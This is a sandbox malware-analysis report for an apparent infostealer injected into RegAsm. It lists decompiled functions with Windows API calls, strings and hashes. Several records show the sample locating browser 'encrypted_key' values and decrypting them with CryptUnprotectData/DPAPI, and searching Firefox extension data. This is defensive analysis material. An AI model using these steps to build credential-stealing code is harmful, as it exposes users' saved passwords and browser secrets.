Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: Windows 11
API String ID: 3676486918-2517555085
Opcode ID: 4545b6f9ea731a0c1759ce425353279a5d3fc895200c98c2723426e5a34f4371
Instruction ID: 1e6bebd888205e227a078e3b4776643881ee4e868955a6116475d087f2d36f09
Opcode Fuzzy Hash: 4545b6f9ea731a0c1759ce425353279a5d3fc895200c98c2723426e5a34f4371
Instruction Fuzzy Hash: 88F04475600304FBEF149B91DC4AFAB7A6AEB4470AF1410A5F60195190E7B6AA909714

Function 00410BA9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 36memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00410C1B,00410B58,?,?,?,00413E5E,Windows: ,00436898), ref: 00410BBD
HeapAlloc.KERNEL32(00000000,?,?,?,00410C1B,00410B58,?,?,?,00413E5E,Windows: ,00436898), ref: 00410BC4
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436880,?,?,?,00410C1B,00410B58,?,?,?,00413E5E,Windows: ,00436898), ref: 00410BE2
RegQueryValueExA.KERNEL32(00436880,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,00410C1B,00410B58,?,?,?,00413E5E,Windows: ), ref: 00410BFD

Strings

CurrentBuildNumber, xrefs: 00410BF5

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3676486918-1022791448
Opcode ID: 0ecaf1e48870f0423982b4fee7b384d053053088746a66fbbe4194decca64022
Instruction ID: ea1df8357be30d2e2ef1433f3f6dded84e3a9a7c3001953f4b75ef12d05b9866
Opcode Fuzzy Hash: 0ecaf1e48870f0423982b4fee7b384d053053088746a66fbbe4194decca64022
Instruction Fuzzy Hash: AAF09075640304FBEF159B90DC0AFAF7A7EEB4470AF240055F601A50A0E6B25A909B60

Function 0041BBEB Relevance: 7.6, APIs: 5, Instructions: 99fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001,759774F0,?,0041CBB8,?,0041CC46,00000000,06400000,00000003,00000000,00417548,.exe,00436C54), ref: 0041BC38
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,759774F0,?,0041CBB8,?,0041CC46,00000000,06400000,00000003,00000000), ref: 0041BC70

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CreatePointer
String ID:
API String ID: 2024441833-0
Opcode ID: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
Instruction ID: 2c4a5b632096eba48b9afdb5f28c6ccb884a723da07998bce4b3731b3edf96f9
Opcode Fuzzy Hash: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
Instruction Fuzzy Hash: 533167B0504B04AFDB344F25A8C4BA776E8E754358F108A3FF19786640E77898C49BD9

Function 00404AB6 Relevance: 7.6, APIs: 5, Instructions: 50stringnetworkCOMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID:
API String ID: 1274457161-0
Opcode ID: f25c82f9083139f9dc305e99f373a1749f43e790606f1cfdd691ee0f4a79a4b6
Instruction ID: f1c5382da97c9dd65e4db87c3c806c9c9b4e03b01775002e3606c6f6cd357758
Opcode Fuzzy Hash: f25c82f9083139f9dc305e99f373a1749f43e790606f1cfdd691ee0f4a79a4b6
Instruction Fuzzy Hash: E9011B72D00218ABDF149BA9DC45ADEBFB8AF55330F10821AF925F72E0DB745A058B94

Function 004083D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNELBASE(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,0040DB0A), ref: 004083F2

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00417044,004366C7,?,?,?,?,00418558), ref: 0041050D

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,0041713D,004366CF,004366CE,?,?,?,?,00418558), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,0041713D,004366CF,004366CE,?,?,?,?,00418558), ref: 00410581

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175B2,004366D6), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417083,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 004105BD

SetEnvironmentVariableA.KERNEL32(?,0043718C,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,004367BF,?,?,?,?,?,?,?,?,0040DB0A), ref: 00408447
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,0040DB0A), ref: 0040845B

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 004083E6, 004083EB, 00408405

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-3463377506
Opcode ID: 92cb3870f75b6ba644ebc7bc9013fe72411ca387304fe8484cf0489906a39471
Instruction ID: 0039211fd2448c0fac8a842e95ae9d76d322b7101a4597bf36c3d7dff0329066
Opcode Fuzzy Hash: 92cb3870f75b6ba644ebc7bc9013fe72411ca387304fe8484cf0489906a39471
Instruction Fuzzy Hash: D3315C71940714ABCF16EF6AED0245D7BA2AB48706F10607BF440B72B0DB7A1A81CF89

Function 00416E60 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000003E8,?,?), ref: 00416EC7
CreateThread.KERNEL32(00000000,00000000,00416D8F,?,00000000,00000000), ref: 00416EFF
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F07

Strings

OEA, xrefs: 00416E82, 00416F2A, 00416EE8

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateObjectSingleSleepThreadWait
String ID: OEA
API String ID: 4198075804-139647401
Opcode ID: 8ffc16897376bbbcd1538edfdffe52226d284d3c3260bc63b219538ddb0ee355
Instruction ID: 3ab628f0377ae1a89a71dd898b99247a1a09803538ed89c7df67326ae102d4be
Opcode Fuzzy Hash: 8ffc16897376bbbcd1538edfdffe52226d284d3c3260bc63b219538ddb0ee355
Instruction Fuzzy Hash: 89215532900218ABCF10EF96E8459DE7BB9FF40318F11412BF904A3150D738EA8ACFA4

Function 00416D8F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55stringCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00416D96
lstrlenA.KERNEL32(?,0000001C), ref: 00416DA1
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416E25

Strings

ERROR, xrefs: 00416E1D

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog3_catchlstrlen
String ID: ERROR
API String ID: 591506033-2861137601
Opcode ID: 1c1caafaf30d7a7d706106c7d93cdd3e980ec53aa5b1dd7ff5b2dd108d700164
Instruction ID: 7e0f82cd00d670f6d3ed87bc16be55dacf2690d9f5db18fbe83db9146c1ce7a1
Opcode Fuzzy Hash: 1c1caafaf30d7a7d706106c7d93cdd3e980ec53aa5b1dd7ff5b2dd108d700164
Instruction Fuzzy Hash: 4D118171900509AFCB40FF75D9025DDBBB1BF04318B90413AE814E3591D739EAA99FC9

Function 00412446 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00414A56), ref: 00412460
WriteFile.KERNEL32(00000000,00000000,?,VJA,00000000,?,?,?,00414A56), ref: 00412487
CloseHandle.KERNEL32(00000000,?,?,?,00414A56), ref: 0041249E

Strings

VJA, xrefs: 0041247C, 0041247F

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID: VJA
API String ID: 1065093856-2621267353
Opcode ID: 618600667c8334e05266c7920bfcba6b014638909509334c775888355d968c7c
Instruction ID: a587d297adf89e60fa6946fdd7da6f666782c0f167f87b21f29bcfda1cd19bad
Opcode Fuzzy Hash: 618600667c8334e05266c7920bfcba6b014638909509334c775888355d968c7c
Instruction Fuzzy Hash: 84F02471200118BFEF01AFA4DD8AFEF379CDF053A8F000022F951D6190D3A58D9157A5

Function 0040B332 Relevance: 6.2, APIs: 4, Instructions: 196filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00417044,004366C7,?,?,?,?,00418558), ref: 0041050D

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,004366FB,?), ref: 00411C79

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175B2,004366D6), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417083,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 004105BD

CopyFileA.KERNEL32(?,?,00000001,0043740C,00436817,?,?,?), ref: 0040B3D7
lstrlenA.KERNEL32(?), ref: 0040B529
lstrlenA.KERNEL32(?), ref: 0040B544
DeleteFileA.KERNEL32(?), ref: 0040B596

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 459cd9c668c9d3dac047d98457e967798d1d03a946412a2b16b812ce937afc69
Instruction ID: 42ca61e586c1720d2c047ca9a9af7e1789792bcd68f96686660d08a5fcddf259
Opcode Fuzzy Hash: 459cd9c668c9d3dac047d98457e967798d1d03a946412a2b16b812ce937afc69
Instruction Fuzzy Hash: 4E713172A00119ABCF01FBA5EE469CD7775EF04309F115036F500B71A1DBB9AE898B99

Function 0040D40E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 125stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,004175EA), ref: 00410538

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,004168FA,?), ref: 00411E37

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00417044,004366C7,?,?,?,?,00418558), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417083,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175B2,004366D6), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

StrStrA.SHLWAPI(00000000,?,00437530,0043689B), ref: 0040D49F
lstrlenA.KERNEL32(?), ref: 0040D4B2

Strings

moz-extension+++, xrefs: 0040D4DD
^userContextId=4294967295, xrefs: 0040D4D7

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 161838763-3310892237
Opcode ID: 14417a856f558ccaf90fcb7bf76eef589fd30e2b75f65c82138e500b4b5c0592
Instruction ID: 4db8db0b305f3fc5c263bdd2f9663bd58fe1f20240ba26d60a6caa46d7645bef
Opcode Fuzzy Hash: 14417a856f558ccaf90fcb7bf76eef589fd30e2b75f65c82138e500b4b5c0592
Instruction Fuzzy Hash: DC41FB76A001199BCF11FBA5DD465CD77B5AF04308F51003AFD40B3192DBB8AE8D8AE9

Function 0040819F Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00417044,004366C7,?,?,?,?,00418558), ref: 0041050D

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,004168FA,?), ref: 00411E37

StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5

Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32($g@,00000000,00000001,00000000,?,00000000,00000000), ref: 00408060
Part of subcall function 00408048: LocalAlloc.KERNEL32(00000040,?,?,?,00406724,?), ref: 0040806E
Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00408084
Part of subcall function 00408048: LocalFree.KERNEL32(?,?,?,00406724,?), ref: 00408093

Part of subcall function 004080A1: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
Part of subcall function 004080A1: LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080D8
Part of subcall function 004080A1: LocalFree.KERNEL32(0040CB95,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080FD

Strings

"encrypted_key":", xrefs: 004081DF
, xrefs: 00408241
DPAPI, xrefs: 0040821B

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
